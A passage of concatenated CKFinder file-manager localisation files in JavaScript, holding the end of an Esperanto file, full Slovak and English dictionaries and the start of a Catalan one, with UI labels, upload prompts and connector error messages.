'Estas ŝargata...', FilesEmpty : 'La dosierujo estas malplena', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Rubujo', BasketClear : 'Malplenigi la rubujon', BasketRemove : 'Repreni el la rubujo', BasketOpenFolder : 'Malfermi la patran dosierujon', BasketTruncateConfirm : 'Ĉu vi certas, ke vi volas forigi ĉiujn dosierojn el la rubujo?', BasketRemoveConfirm : 'Ĉu vi certas, ke vi volas forigi la dosieron "%1" el la rubujo?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Neniu dosiero en la rubujo, demetu kelkajn.', BasketCopyFilesHere : 'Kopii dosierojn el la rubujo', BasketMoveFilesHere : 'Movi dosierojn el la rubujo', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Alŝuti', UploadTip : 'Alŝuti novan dosieron', Refresh : 'Aktualigo', Settings : 'Agordo', Help : 'Helpilo', HelpTip : 'Helpilo', // Context Menus Select : 'Selekti', SelectThumbnail : 'Selekti miniaturon', View : 'Vidi', Download : 'Elŝuti', NewSubFolder : 'Nova subdosierujo', Rename : 'Renomi', Delete : 'Forigi', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopii tien ĉi', MoveDragDrop : 'Movi tien ĉi', // Dialogs RenameDlgTitle : 'Renomi', NewNameDlgTitle : 'Nova dosiero', FileExistsDlgTitle : 'Dosiero jam ekzistas', SysErrorDlgTitle : 'Sistemeraro', FileOverwrite : 'Anstataŭigi', FileAutorename : 'Aŭtomata renomo', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Bone', CancelBtn : 'Rezigni', CloseBtn : 'Fermi', // Upload Panel UploadTitle : 'Alŝuti novan dosieron', UploadSelectLbl : 'Selekti la alŝutotan dosieron', UploadProgressLbl : '(Estas alŝutata, bonvolu pacienci...)', UploadBtn : 'Alŝuti la selektitan dosieron', UploadBtnCancel : 'Rezigni', UploadNoFileMsg : 'Selekti dosieron el via komputilo.', UploadNoFolder : 'Bonvolu selekti dosierujon antaŭ la alŝuto.', UploadNoPerms : 'La dosieralŝuto ne estas permesita.', UploadUnknError : 'Eraro dum la dosieralŝuto.', UploadExtIncorrect : 'La dosiernoma finaĵo ne estas permesita en tiu dosierujo.', // Flash Uploads UploadLabel : 'Alŝutotaj dosieroj', UploadTotalFiles : 'Dosieroj:', UploadTotalSize : 'Grando de la dosieroj:', UploadSend : 'Alŝuti', UploadAddFiles : 'Almeti dosierojn', UploadClearFiles : 'Forigi dosierojn', UploadCancel : 'Rezigni la alŝuton', UploadRemove : 'Forigi', UploadRemoveTip : 'Forigi !f', UploadUploaded : 'Alŝutita !n%', UploadProcessing : 'Estas alŝutata...', // Settings Panel SetTitle : 'Agordo', SetView : 'Vidi:', SetViewThumb : 'Miniaturoj', SetViewList : 'Listo', SetDisplay : 'Vidigi:', SetDisplayName : 'Dosiernomo', SetDisplayDate : 'Dato', SetDisplaySize : 'Dosiergrando', SetSort : 'Ordigo:', SetSortName : 'laŭ dosiernomo', SetSortDate : 'laŭ dato', SetSortSize : 'laŭ grando', SetSortExtension : 'laŭ dosiernoma finaĵo', // Status Bar FilesCountEmpty : '<Malplena dosiero>', FilesCountOne : '1 dosiero', FilesCountMany : '%1 dosieroj', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Ne eblis plenumi la peton. (Eraro %1)', Errors : { 10 : 'Nevalida komando.', 11 : 'La risurctipo ne estas indikita en la komando.', 12 : 'La risurctipo ne estas valida.', 102 : 'La dosier- aŭ dosierujnomo ne estas valida.', 103 : 'Ne eblis plenumi la peton pro rajtaj limigoj.', 104 : 'Ne eblis plenumi la peton pro atingopermesaj limigoj.', 105 : 'Nevalida dosiernoma finaĵo.', 109 : 'Nevalida peto.', 110 : 'Nekonata eraro.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Dosiero aŭ dosierujo kun tiu nomo jam ekzistas.', 116 : 'Tiu dosierujo ne ekzistas. Bonvolu aktualigi kaj reprovi.', 117 : 'Tiu dosiero ne ekzistas. Bonvolu aktualigi kaj reprovi.', 118 : 'La vojoj al la fonto kaj al la celo estas samaj.', 201 : 'Dosiero kun la sama nomo jam ekzistas. La alŝutita dosiero estas renomita al "%1".', 202 : 'Nevalida dosiero.', 203 : 'Nevalida dosiero. La grando estas tro alta.', 204 : 'La alŝutita dosiero estas difektita.', 205 : 'Neniu provizora dosierujo estas disponebla por alŝuto al la servilo.', 206 : 'Alŝuto nuligita pro kialoj pri sekureco. La dosiero entenas datenojn de HTMLtipo.', 207 : 'La alŝutita dosiero estas renomita al "%1".', 300 : 'La movo de la dosieroj malsukcesis.', 301 : 'La kopio de la dosieroj malsukcesis.', 500 : 'La dosieradministra sistemo estas malvalidigita. Kontaktu vian administranton kaj kontrolu la agordodosieron de CKFinder.', 501 : 'La eblo de miniaturoj estas malvalidigita.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'La dosiernomo ne povas esti malplena.', FileExists : 'La dosiero %s jam ekzistas.', FolderEmpty : 'La dosierujnomo ne povas esti malplena.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'La dosiernomo ne povas enhavi la sekvajn signojn : \n\\ / : * ? " < > |', FolderInvChar : 'La dosierujnomo ne povas enhavi la sekvajn signojn : \n\\ / : * ? " < > |', PopupBlockView : 'Ne eblis malfermi la dosieron en nova fenestro. Agordu vian retumilon kaj malŝaltu vian ŝprucfenestran blokilon por tiu retpaĝaro.', XmlError : 'Ne eblis kontentige elŝuti la XML respondon el la servilo.', XmlEmpty : 'Ne eblis elŝuti la XML respondon el la servilo. La servilo resendis malplenan respondon.', XmlRawResponse : 'Kruda respondo el la servilo: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Plimalpligrandigi %s', sizeTooBig : 'Ne eblas ŝanĝi la alton aŭ larĝon de tiu bildo ĝis valoro pli granda ol la origina grando (%size).', resizeSuccess : 'La bildgrando estas sukcese ŝanĝita.', thumbnailNew : 'Krei novan miniaturon', thumbnailSmall : 'Malgranda (%s)', thumbnailMedium : 'Meza (%s)', thumbnailLarge : 'Granda (%s)', newSize : 'Fiksi la novajn grando-erojn', width : 'Larĝo', height : 'Alto', invalidHeight : 'Nevalida alto.', invalidWidth : 'Nevalida larĝo.', invalidName : 'Nevalida dosiernomo.', newImage : 'Krei novan bildon', noExtensionChange : 'Ne eblas ŝanĝi la dosiernoman finaĵon.', imageSmall : 'La bildo estas tro malgranda', contextMenuName : 'Ŝanĝi la grandon', lockRatio : 'Konservi proporcion', resetSize : 'Origina grando' }, // Fileeditor plugin Fileeditor : { save : 'Konservi', fileOpenError : 'Ne eblas malfermi la dosieron', fileSaveSuccess : 'La dosiero estas sukcese konservita.', contextMenuName : 'Redakti', loadingFile : 'La dosiero estas elŝutata, bonvolu pacienci...' }, Maximize : { maximize : 'Pligrandigi', minimize : 'Malpligrandigi' }, Gallery : { current : 'Bildo {current} el {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Slovak * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['sk'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nedostupné</span>', confirmCancel : 'Niektoré možnosti boli zmenené. Naozaj chcete zavrieť okno?', ok : 'OK', cancel : 'Zrušiť', confirmationTitle : 'Potvrdenie', messageTitle : 'Informácia', inputTitle : 'Otázka', undo : 'Späť', redo : 'Znovu', skip : 'Preskočiť', skipAll : 'Preskočiť všetko', makeDecision : 'Aký úkon sa má vykonať?', rememberDecision: 'Pamätať si rozhodnutie' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'sk', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'mm/dd/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Adresáre', FolderLoading : 'Nahrávam...', FolderNew : 'Zadajte prosím meno nového adresára: ', FolderRename : 'Zadajte prosím meno nového adresára: ', FolderDelete : 'Skutočne zmazať adresár "%1"?', FolderRenaming : ' (Prebieha premenovanie adresára...)', FolderDeleting : ' (Prebieha zmazanie adresára...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Zadajte prosím meno nového súboru: ', FileRenameExt : 'Skutočne chcete zmeniť príponu súboru? Upozornenie: zmenou prípony sa súbor môže stať nepoužiteľným, pokiaľ prípona nie je podporovaná.', FileRenaming : 'Prebieha premenovanie súboru...', FileDelete : 'Skutočne chcete odstrániť súbor "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Nahrávam...', FilesEmpty : 'Adresár je prázdny.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Košík', BasketClear : 'Vyprázdniť košík', BasketRemove : 'Odstrániť z košíka', BasketOpenFolder : 'Otvoriť nadradený adresár', BasketTruncateConfirm : 'Naozaj chcete odstrániť všetky súbory z košíka?', BasketRemoveConfirm : 'Naozaj chcete odstrániť súbor "%1" z košíka?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'V košíku nie sú žiadne súbory, potiahnite a vložte nejaký.', BasketCopyFilesHere : 'Prekopírovať súbory z košíka', BasketMoveFilesHere : 'Presunúť súbory z košíka', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Prekopírovať na server (Upload)', UploadTip : 'Prekopírovať nový súbor', Refresh : 'Znovunačítať (Refresh)', Settings : 'Nastavenia', Help : 'Pomoc', HelpTip : 'Pomoc', // Context Menus Select : 'Vybrať', SelectThumbnail : 'Zvoľte miniatúru', View : 'Náhľad', Download : 'Stiahnuť', NewSubFolder : 'Nový podadresár', Rename : 'Premenovať', Delete : 'Zmazať', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Prekopírovať sem', MoveDragDrop : 'Presunúť sem', // Dialogs RenameDlgTitle : 'Premenovať', NewNameDlgTitle : 'Nové meno', FileExistsDlgTitle : 'Súbor už existuje', SysErrorDlgTitle : 'Systémová chyba', FileOverwrite : 'Prepísať', FileAutorename : 'Auto-premenovanie', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Zrušiť', CloseBtn : 'Zatvoriť', // Upload Panel UploadTitle : 'Nahrať nový súbor', UploadSelectLbl : 'Vyberte súbor, ktorý chcete prekopírovať na server', UploadProgressLbl : '(Prebieha kopírovanie, čakajte prosím...)', UploadBtn : 'Prekopírovať vybratý súbor', UploadBtnCancel : 'Zrušiť', UploadNoFileMsg : 'Vyberte prosím súbor na Vašom počítači!', UploadNoFolder : 'Pred náhrávaním zvoľte adresár, prosím', UploadNoPerms : 'Nahratie súboru nie je povolené.', UploadUnknError : 'V priebehu posielania súboru sa vyskytla chyba.', UploadExtIncorrect : 'V tomto adresári nie je povolený tento formát súboru.', // Flash Uploads UploadLabel : 'Súbory k nahratiu', UploadTotalFiles : 'Všetky súbory:', UploadTotalSize : 'Celková veľkosť:', UploadSend : 'Prekopírovať na server', UploadAddFiles : 'Pridať súbory', UploadClearFiles : 'Vyčistiť súbory', UploadCancel : 'Zrušiť nahratie', UploadRemove : 'Odstrániť', UploadRemoveTip : 'Odstrániť !f', UploadUploaded : 'Nahraté !n%', UploadProcessing : 'Spracováva sa ...', // Settings Panel SetTitle : 'Nastavenia', SetView : 'Náhľad:', SetViewThumb : 'Miniobrázky', SetViewList : 'Zoznam', SetDisplay : 'Zobraziť:', SetDisplayName : 'Názov súboru', SetDisplayDate : 'Dátum', SetDisplaySize : 'Veľkosť súboru', SetSort : 'Zoradenie:', SetSortName : 'podľa názvu súboru', SetSortDate : 'podľa dátumu', SetSortSize : 'podľa veľkosti', SetSortExtension : 'podľa formátu', // Status Bar FilesCountEmpty : '<Prázdny adresár>', FilesCountOne : '1 súbor', FilesCountMany : '%1 súborov', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Server nemohol dokončiť spracovanie požiadavky. (Chyba %1)', Errors : { 10 : 'Neplatný príkaz.', 11 : 'V požiadavke nebol špecifikovaný typ súboru.', 12 : 'Nepodporovaný typ súboru.', 102 : 'Neplatný názov súboru alebo adresára.', 103 : 'Nebolo možné dokončiť spracovanie požiadavky kvôli nepostačujúcej úrovni oprávnení.', 104 : 'Nebolo možné dokončiť spracovanie požiadavky kvôli obmedzeniam v prístupových právach k súborom.', 105 : 'Neplatná prípona súboru.', 109 : 'Neplatná požiadavka.', 110 : 'Neidentifikovaná chyba.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Zadaný súbor alebo adresár už existuje.', 116 : 'Adresár nebol nájdený. Aktualizujte obsah adresára (Znovunačítať) a skúste znovu.', 117 : 'Súbor nebol nájdený. Aktualizujte obsah adresára (Znovunačítať) a skúste znovu.', 118 : 'Zdrojové a cieľové cesty sú rovnaké.', 201 : 'Súbor so zadaným názvom už existuje. Prekopírovaný súbor bol premenovaný na "%1".', 202 : 'Neplatný súbor.', 203 : 'Neplatný súbor - súbor presahuje maximálnu povolenú veľkosť.', 204 : 'Kopírovaný súbor je poškodený.', 205 : 'Server nemá špecifikovaný dočasný adresár pre kopírované súbory.', 206 : 'Kopírovanie prerušené kvôli nedostatočnému zabezpečeniu. Súbor obsahuje HTML data.', 207 : 'Prekopírovaný súbor bol premenovaný na "%1".', 300 : 'Presunutie súborov zlyhalo.', 301 : 'Kopírovanie súborov zlyhalo.', 500 : 'Prehliadanie súborov je zakázané kvôli bezpečnosti. Kontaktujte prosím administrátora a overte nastavenia v konfiguračnom súbore pre CKFinder.', 501 : 'Momentálne nie je zapnutá podpora pre generáciu miniobrázkov.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Názov súboru nesmie byť prázdne.', FileExists : 'Súbor %s už existuje.', FolderEmpty : 'Názov adresára nesmie byť prázdny.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Súbor nesmie obsahovať žiadny z nasledujúcich znakov: \n\\ / : * ? " < > |', FolderInvChar : 'Adresár nesmie obsahovať žiadny z nasledujúcich znakov: \n\\ / : * ? " < > |', PopupBlockView : 'Nebolo možné otvoriť súbor v novom okne. Overte nastavenia Vášho prehliadača a zakážte všetky blokovače popup okien pre túto webstránku.', XmlError : 'Nebolo možné korektne načítať XML odozvu z web serveu.', XmlEmpty : 'Nebolo možné korektne načítať XML odozvu z web serveu. Server vrátil prázdnu odpoveď (odozvu).', XmlRawResponse : 'Neupravená odpoveď zo servera: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Zmeniť veľkosť %s', sizeTooBig : 'Nie je možné nastaviť výšku alebo šírku obrázku na väčšie hodnoty ako originálnu veľkosť (%size).', resizeSuccess : 'Zmena vľkosti obrázku bola úspešne vykonaná.', thumbnailNew : 'Vytvoriť novú miniatúru obrázku', thumbnailSmall : 'Malý (%s)', thumbnailMedium : 'Stredný (%s)', thumbnailLarge : 'Veľký (%s)', newSize : 'Nastaviť novú veľkosť', width : 'Šírka', height : 'Výška', invalidHeight : 'Neplatná výška.', invalidWidth : 'Neplatná šírka.', invalidName : 'Neplatný názov súboru.', newImage : 'Vytvoriť nový obrázok', noExtensionChange : 'Nie je možné zmeniť formát súboru.', imageSmall : 'Zdrojový obrázok je veľmi malý.', contextMenuName : 'Zmeniť veľkosť', lockRatio : 'Zámok', resetSize : 'Pôvodná veľkosť' }, // Fileeditor plugin Fileeditor : { save : 'Uložiť', fileOpenError : 'Nie je možné otvoriť súbor.', fileSaveSuccess : 'Súbor bol úspešne uložený.', contextMenuName : 'Upraviť', loadingFile : 'Súbor sa nahráva, prosím čakať...' }, Maximize : { maximize : 'Maximalizovať', minimize : 'Minimalizovať' }, Gallery : { current : 'Obrázok {current} z {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the English * language. This is the base file for all translations. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['en'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, unavailable</span>', confirmCancel : 'Some of the options were changed. Are you sure you want to close the dialog window?', ok : 'OK', cancel : 'Cancel', confirmationTitle : 'Confirmation', messageTitle : 'Information', inputTitle : 'Question', undo : 'Undo', redo : 'Redo', skip : 'Skip', skipAll : 'Skip all', makeDecision : 'What action should be taken?', rememberDecision: 'Remember my decision' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'en', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'm/d/yyyy h:MM aa', DateAmPm : ['AM','PM'], // Folders FoldersTitle : 'Folders', FolderLoading : 'Loading...', FolderNew : 'Please type the new folder name: ', FolderRename : 'Please type the new folder name: ', FolderDelete : 'Are you sure you want to delete the "%1" folder?', FolderRenaming : ' (Renaming...)', FolderDeleting : ' (Deleting...)', DestinationFolder : 'Destination Folder', // Files FileRename : 'Please type the new file name: ', FileRenameExt : 'Are you sure you want to change the file extension? The file may become unusable.', FileRenaming : 'Renaming...', FileDelete : 'Are you sure you want to delete the file "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', FilesLoading : 'Loading...', FilesEmpty : 'The folder is empty.', DestinationFile : 'Destination File', SkippedFiles : 'List of skipped files:', // Basket BasketFolder : 'Basket', BasketClear : 'Clear Basket', BasketRemove : 'Remove from Basket', BasketOpenFolder : 'Open Parent Folder', BasketTruncateConfirm : 'Do you really want to remove all files from the basket?', BasketRemoveConfirm : 'Do you really want to remove the file "%1" from the basket?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', BasketEmpty : 'No files in the basket, drag and drop some.', BasketCopyFilesHere : 'Copy Files from Basket', BasketMoveFilesHere : 'Move Files from Basket', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', OperationCompletedErrors : 'Operation completed with errors.', FileError : '%s: %e', // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', CopiedFilesNumber : 'Number of files copied: %s.', MoveFailedList : 'The following files could not be moved:<br />%s', CopyFailedList : 'The following files could not be copied:<br />%s', // Toolbar Buttons (some used elsewhere) Upload : 'Upload', UploadTip : 'Upload New File', Refresh : 'Refresh', Settings : 'Settings', Help : 'Help', HelpTip : 'Help', // Context Menus Select : 'Select', SelectThumbnail : 'Select Thumbnail', View : 'View', Download : 'Download', NewSubFolder : 'New Subfolder', Rename : 'Rename', Delete : 'Delete', DeleteFiles : 'Delete Files', CopyDragDrop : 'Copy Here', MoveDragDrop : 'Move Here', // Dialogs RenameDlgTitle : 'Rename', NewNameDlgTitle : 'New Name', FileExistsDlgTitle : 'File Already Exists', SysErrorDlgTitle : 'System Error', FileOverwrite : 'Overwrite', FileAutorename : 'Auto-rename', ManuallyRename : 'Manually rename', // Generic OkBtn : 'OK', CancelBtn : 'Cancel', CloseBtn : 'Close', // Upload Panel UploadTitle : 'Upload New File', UploadSelectLbl : 'Select a file to upload', UploadProgressLbl : '(Upload in progress, please wait...)', UploadBtn : 'Upload Selected File', UploadBtnCancel : 'Cancel', UploadNoFileMsg : 'Please select a file from your computer.', UploadNoFolder : 'Please select a folder before uploading.', UploadNoPerms : 'File upload not allowed.', UploadUnknError : 'Error sending the file.', UploadExtIncorrect : 'File extension not allowed in this folder.', // Flash Uploads UploadLabel : 'Files to Upload', UploadTotalFiles : 'Total Files:', UploadTotalSize : 'Total Size:', UploadSend : 'Upload', UploadAddFiles : 'Add Files', UploadClearFiles : 'Clear Files', UploadCancel : 'Cancel Upload', UploadRemove : 'Remove', UploadRemoveTip : 'Remove !f', UploadUploaded : 'Uploaded !n%', UploadProcessing : 'Processing...', // Settings Panel SetTitle : 'Settings', SetView : 'View:', SetViewThumb : 'Thumbnails', SetViewList : 'List', SetDisplay : 'Display:', SetDisplayName : 'File Name', SetDisplayDate : 'Date', SetDisplaySize : 'File Size', SetSort : 'Sorting:', SetSortName : 'by File Name', SetSortDate : 'by Date', SetSortSize : 'by Size', SetSortExtension : 'by Extension', // Status Bar FilesCountEmpty : '<Empty Folder>', FilesCountOne : '1 file', FilesCountMany : '%1 files', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'It was not possible to complete the request. (Error %1)', Errors : { 10 : 'Invalid command.', 11 : 'The resource type was not specified in the request.', 12 : 'The requested resource type is not valid.', 102 : 'Invalid file or folder name.', 103 : 'It was not possible to complete the request due to authorization restrictions.', 104 : 'It was not possible to complete the request due to file system permission restrictions.', 105 : 'Invalid file extension.', 109 : 'Invalid request.', 110 : 'Unknown error.', 111 : 'It was not possible to complete the request due to resulting file size.', 115 : 'A file or folder with the same name already exists.', 116 : 'Folder not found. Please refresh and try again.', 117 : 'File not found. Please refresh the files list and try again.', 118 : 'Source and target paths are equal.', 201 : 'A file with the same name is already available. The uploaded file was renamed to "%1".', 202 : 'Invalid file.', 203 : 'Invalid file. The file size is too big.', 204 : 'The uploaded file is corrupt.', 205 : 'No temporary folder is available for upload in the server.', 206 : 'Upload cancelled due to security reasons. The file contains HTML-like data.', 207 : 'The uploaded file was renamed to "%1".', 300 : 'Moving file(s) failed.', 301 : 'Copying file(s) failed.', 500 : 'The file browser is disabled for security reasons. Please contact your system administrator and check the CKFinder configuration file.', 501 : 'The thumbnails support is disabled.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'The file name cannot be empty.', FileExists : 'File %s already exists.', FolderEmpty : 'The folder name cannot be empty.', FolderExists : 'Folder %s already exists.', FolderNameExists : 'Folder already exists.', FileInvChar : 'The file name cannot contain any of the following characters: \n\\ / : * ? " < > |', FolderInvChar : 'The folder name cannot contain any of the following characters: \n\\ / : * ? " < > |', PopupBlockView : 'It was not possible to open the file in a new window. Please configure your browser and disable all popup blockers for this site.', XmlError : 'It was not possible to properly load the XML response from the web server.', XmlEmpty : 'It was not possible to load the XML response from the web server. The server returned an empty response.', XmlRawResponse : 'Raw response from the server: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Resize %s', sizeTooBig : 'Cannot set image height or width to a value bigger than the original size (%size).', resizeSuccess : 'Image resized successfully.', thumbnailNew : 'Create a new thumbnail', thumbnailSmall : 'Small (%s)', thumbnailMedium : 'Medium (%s)', thumbnailLarge : 'Large (%s)', newSize : 'Set a new size', width : 'Width', height : 'Height', invalidHeight : 'Invalid height.', invalidWidth : 'Invalid width.', invalidName : 'Invalid file name.', newImage : 'Create a new image', noExtensionChange : 'File extension cannot be changed.', imageSmall : 'Source image is too small.', contextMenuName : 'Resize', lockRatio : 'Lock ratio', resetSize : 'Reset size' }, // Fileeditor plugin Fileeditor : { save : 'Save', fileOpenError : 'Unable to open file.', fileSaveSuccess : 'File saved successfully.', contextMenuName : 'Edit', loadingFile : 'Loading file, please wait...' }, Maximize : { maximize : 'Maximize', minimize : 'Minimize' }, Gallery : { current : 'Image {current} of {total}' }, Zip : { extractHereLabel : 'Extract here', extractToLabel : 'Extract to...', downloadZipLabel : 'Download as zip', compressZipLabel : 'Compress to zip', removeAndExtract : 'Remove existing and extract', extractAndOverwrite : 'Extract overwriting existing files', extractSuccess : 'File extracted successfully.' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Catalan * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['ca'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, no disponible</span>', confirmCancel : 'Algunes opcions s\'han canviat\r\nEstàs segur de tancar el quadre de diàleg?', ok : 'Acceptar', cancel : 'Cancel·lar', confirmationTitle : 'Confirmació', messageTitle : 'Informació', inputTitle : 'Pregunta', undo : 'Desfer', redo : 'Refer', skip : 'Ometre', skipAll : 'Ometre tots', makeDecision : 'Quina acció s\'ha de realitzar?', rememberDecision: 'Recordar la meva decisió' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'ca', LangCode : 'ca', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Carpetes', FolderLoading : 'Carregant...', FolderNew : 'Si us plau, escriu el nom per la nova carpeta: ', FolderRename : 'Si us plau, escriu el nom per la carpeta: ', FolderDelete : 'Estàs segur que vols esborrar la carpeta "%1"?', FolderRenaming : ' (Canviant el nom...)', FolderDeleting : ' (Esborrant...)', DestinationFolder : 'Carpeta de destinació', // Files FileRename : 'Si us plau, escriu el nom del fitxer: ', FileRenameExt : 'Estàs segur de canviar la extensió del fitxer? El fitxer pot quedar inservible.', FileRenaming : 'Canviant el nom...', FileDelete : 'Estàs segur d\'esborrar el fitxer "%1"?', FilesDelete : 'Estàs segur d\'esborrar els %1 fitxers?', FilesLoading : 'Carregant...', FilesEmpty : 'Carpeta buida', DestinationFile : 'Fitxer de destinació', SkippedFiles : 'Llista dels fitxers omesos:', // Basket BasketFolder : 'Cistella', BasketClear : 'Buidar la cistella', BasketRemove : 'Treure de la cistella', BasketOpenFolder : 'Obrir carpeta pare', BasketTruncateConfirm : 'Estàs segur de treure tots els fitxers de la cistella?', BasketRemoveConfirm : 'Estàs segur de treure el fitxer "%1" de la cistella?', BasketRemoveConfirmMultiple : 'Estàs segur de treure els %1 fitxers de la cistella?', BasketEmpty : 'No hi ha fitxers a la cistella, arrossega i deixa anar alguns.', BasketCopyFilesHere : 'Copiar fitxers de la cistella', BasketMoveFilesHere : 'Moure fitxers de la cistella', // Global messages OperationCompletedSuccess : 'Operació completada correctament.', OperationCompletedErrors : 'Operació completada amb errors.', FileError : '%s: %e', // Move and Copy files MovedFilesNumber : 'Número de fitxers moguts: %s.', CopiedFilesNumber : 'Número de fitxers copiats: %s.', MoveFailedList : 'Els següents fitxers no s\'han pogut moure:<br />%s', CopyFailedList : 'Els següents fitxers no s\'han pogut copiar:<br />%s', // Toolbar Buttons (some used elsewhere) Upload : 'Afegir', UploadTip : 'Afegir nou fitxer', Refresh : 'Actualitzar', Settings : 'Configuració', Help : 'Ajuda', HelpTip : 'Ajuda', // Context Menus Select : 'Seleccionar', 